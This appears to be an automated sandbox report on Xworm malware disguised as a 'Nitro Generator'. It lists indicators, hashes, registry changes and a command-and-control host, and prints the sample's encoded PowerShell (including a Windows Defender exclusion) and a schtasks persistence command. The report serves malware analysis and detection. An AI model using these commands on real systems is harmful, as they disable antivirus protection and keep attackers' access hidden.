Analysis Overview
SHA256
c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
Threat Level: Known bad
The file Nitro Generator v1.exe was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Executes dropped EXE
Loads dropped DLL
Checks computer location settings
Drops startup file
Adds Run key to start application
Looks up external IP address via web service
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-21 23:03
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-21 23:03
Reported
2024-06-21 23:05
Platform
win10v2004-20240508-en
Max time kernel
105s
Max time network
51s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Windows\Nitro Generator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NitroGen.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Windows\Nitro Generator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Nitro Generator.exe | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
C:\Windows\Nitro Generator.exe
"C:\Windows\Nitro Generator.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | runderscore00-25851.portmap.host | udp |
Files
memory/4068-1-0x00000000002A0000-0x00000000002DE000-memory.dmp
memory/4068-0-0x00007FFD614D3000-0x00007FFD614D5000-memory.dmp
memory/4068-2-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
memory/2816-12-0x000001FDF39A0000-0x000001FDF39C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cyac3gp5.zx5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2816-13-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
memory/2816-14-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
memory/2816-15-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
| MD5 | 16c70bc93e70148d8e32877fb69c5163 |
| SHA1 | 9997631ad75d02297a4c7a06c37db115a0a1c0ec |
| SHA256 | b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d |
| SHA512 | 02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd |
C:\Windows\Nitro Generator.exe
| MD5 | 8bbf53c41f2625a3c4e608ad13cb2c55 |
| SHA1 | 3335287d42f6e674eb1d4465949e02d262bb8391 |
| SHA256 | ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299 |
| SHA512 | 9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec |
memory/3772-38-0x0000000000850000-0x000000000086A000-memory.dmp
memory/4068-39-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
memory/3180-52-0x000001EDE9FB0000-0x000001EDEA1CC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e1d7973fb9071815b4241da5ec0dfb6a |
| SHA1 | 41f06afbd0ac9f9a0b226a2dd6fa9495d83209b9 |
| SHA256 | b3953ac9f5752d996ec2545864d6ccf09ffe4b0f84f41a2cc52a95ad8103212b |
| SHA512 | 66163114aba8867561ceac2124bc2060c351cb4a83c4f8d40bc6bfd8042881690ea8152e2b58ec55b4b6de17e1610642c90df602e1fb2658b4c3d0783f3a0900 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/2816-56-0x000001FDF3A20000-0x000001FDF3C3C000-memory.dmp
memory/2816-57-0x00007FFD614D0000-0x00007FFD61F91000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-21 23:03
Reported
2024-06-21 23:05
Platform
win11-20240508-en
Max time kernel
146s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NitroGen.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Windows\Nitro Generator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Nitro Generator.exe | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
C:\Windows\Nitro Generator.exe
"C:\Windows\Nitro Generator.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | runderscore00-25851.portmap.host | udp |
Files
memory/2716-1-0x00007FFF96EB3000-0x00007FFF96EB5000-memory.dmp
memory/2716-0-0x00000000005C0000-0x00000000005FE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c14k0kjf.zq3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4852-12-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-7-0x000001CB69FA0000-0x000001CB69FC2000-memory.dmp
memory/2716-2-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-13-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-14-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-15-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
| MD5 | 16c70bc93e70148d8e32877fb69c5163 |
| SHA1 | 9997631ad75d02297a4c7a06c37db115a0a1c0ec |
| SHA256 | b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d |
| SHA512 | 02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd |
C:\Windows\Nitro Generator.exe
| MD5 | 8bbf53c41f2625a3c4e608ad13cb2c55 |
| SHA1 | 3335287d42f6e674eb1d4465949e02d262bb8391 |
| SHA256 | ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299 |
| SHA512 | 9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec |
memory/244-46-0x0000000000530000-0x000000000054A000-memory.dmp
memory/2716-48-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
memory/4852-54-0x00007FFF96EB0000-0x00007FFF97972000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0f0f33b5dc59d6998bdba6a65e602a1c |
| SHA1 | 80c26491daacdd38a1f174ea5a6be01532bc1da9 |
| SHA256 | a5e18203246fdf1199469165357bd5329f0e8f4a77282045c01a43cba0a7e2ed |
| SHA512 | 12027f852b46df30587773e35cd2e380a4876557b2b857dcbbbf3650e44c8c88e4c0ea085d125e5c19258d860e0a4bf27f48c7f0a9ec4181f03534df1d91ef4f |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.log
| MD5 | 2cbbb74b7da1f720b48ed31085cbd5b8 |
| SHA1 | 79caa9a3ea8abe1b9c4326c3633da64a5f724964 |
| SHA256 | e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3 |
| SHA512 | ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-21 23:03
Reported
2024-06-21 23:05
Platform
win7-20240220-en
Max time kernel
145s
Max time network
147s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk | C:\Windows\Nitro Generator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NitroGen.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
| N/A | N/A | C:\ProgramData\svchost | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" | C:\Windows\Nitro Generator.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Nitro Generator.exe | C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Nitro Generator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\svchost | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Nitro Generator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe
"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe
"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"
C:\Windows\Nitro Generator.exe
"C:\Windows\Nitro Generator.exe"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"
C:\Windows\system32\taskeng.exe
taskeng.exe {8DBD58ED-AD28-40D6-90C3-D7053C731BEB} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
C:\ProgramData\svchost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | runderscore00-25851.portmap.host | udp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
| DE | 193.161.193.99:25851 | runderscore00-25851.portmap.host | tcp |
Files
memory/2912-0-0x000007FEF5573000-0x000007FEF5574000-memory.dmp
memory/2912-1-0x0000000000F40000-0x0000000000F7E000-memory.dmp
memory/2912-4-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
memory/2888-7-0x0000000002D00000-0x0000000002D80000-memory.dmp
memory/2888-8-0x000000001B840000-0x000000001BB22000-memory.dmp
memory/2888-9-0x0000000002960000-0x0000000002968000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 180792358c1f1b6cb9af0cecfa83087c |
| SHA1 | 91d3e9e6c9f5050b910de3588bf2ef027c465eaf |
| SHA256 | 1134edb33019281abee55820bb499cf9263696cff06282507336305ff50b55bb |
| SHA512 | 463d1ddd0ec3065a05d6fe52835c59242862e29c183ec14c942daf6785d1c667bd85cb9b57f4198f80f7882b27b7d480e0eb56f78350ba3283b949fda65e2c40 |
\Users\Admin\AppData\Local\Temp\NitroGen.exe
| MD5 | 16c70bc93e70148d8e32877fb69c5163 |
| SHA1 | 9997631ad75d02297a4c7a06c37db115a0a1c0ec |
| SHA256 | b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d |
| SHA512 | 02242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd |
C:\Windows\Nitro Generator.exe
| MD5 | 8bbf53c41f2625a3c4e608ad13cb2c55 |
| SHA1 | 3335287d42f6e674eb1d4465949e02d262bb8391 |
| SHA256 | ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299 |
| SHA512 | 9c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec |
memory/2504-26-0x0000000000EC0000-0x0000000000EDA000-memory.dmp
memory/2912-27-0x000007FEF5570000-0x000007FEF5F5C000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
